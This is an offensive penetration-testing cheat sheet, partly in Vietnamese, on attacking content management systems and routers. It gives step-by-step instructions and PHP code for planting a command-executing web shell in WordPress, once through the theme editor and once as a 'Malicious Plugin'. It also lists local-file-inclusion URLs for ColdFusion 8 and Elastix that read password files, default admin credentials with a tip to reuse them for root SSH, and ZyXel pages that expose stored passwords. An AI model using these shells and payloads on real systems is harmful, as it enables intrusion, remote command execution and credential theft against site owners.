Skip to main content

CMS

  • Enumerate version and few other details
  • Google their vulnerability

Wordpress

Trang Admin 

/wp-admin
/wp-login

Config files 

setup-config.php
wp-config.php

Tìm kiếm người dùng 

/?author=1, /?author=2,

Tải shell lên WP_THEME

  1. Đăng nhập vào wp-admin và vào Apperanc
  2. Vào Editor và chọn theme có quyền chỉnh sửa
  3. Cho webshell vào theme
<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
  1. Update file và truy cập <url>/wordpress/wp-content/themes/twentyfifteen/404.php/?cmd=

Tải shell lên WP_PLUGIN

  1. Đăng nhập vào wp-admin và vào Plugins
  2. Add 1 plugin mới với file zip hoặc thay đổi plugin .php có sẵn (nhớ phải có comment về thông tin plugin)
<?php
/*
Plugin Name: Malicious Plugin
Description: A simple plugin for demonstration.
Version: 1.0
Author: Test
*/
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

  1. Truy cập vào <url>/wp-content/plugins/malicious_plugin/plugin_cmd.php/?cmd=

Drupal

Droopescan 

droopescan scan drupal -u http://example.org/ -t 32

Find version 

/CHANGELOG.txt

Adobe Cold Fusion

Determine version 

/CFIDE/adminapi/base.cfc?wsdl

Version 8 Vulnerability

  • fckeditor

  • LFI

    http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Elastix

  • Google the vulnerabitlities
  • default login are admin:admin at /vtigercrm/
  • able to upload shell in profile-photo

2.2.0 - 'graph.php' Local File Inclusion

http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Note: Most probably this will be same password for root user too , so you can directly ssh through it

Joomla

  • Admin page - /administrator
  • Configuration files
  • configuration.php
    diagnostics.php
    joomla.inc.php
    config.inc.php

Mambo

Config files

configuration.php
config.inc.php

ZyXel

Configuration files

/WAN.html (contains PPPoE ISP password) 
/WLAN_General.html and /WLAN.html (contains WEP key) 
/rpDyDNS.html (contains DDNS credentials) 
/Firewall_DefPolicy.html (Firewall) 
/CF_Keyword.html (Content Filter) 
/RemMagWWW.html (Remote MGMT) 
/rpSysAdmin.html (System) 
/LAN_IP.html (LAN) 
/NAT_General.html (NAT) 
/ViewLog.html (Logs) 
/rpFWUpload.html (Tools) 
/DiagGeneral.html (Diagnostic) 
/RemMagSNMP.html (SNMP Passwords) 
/LAN_ClientList.html (Current DHCP Leases) 

# Config Backups
/RestoreCfg.html
/BackupCfg.html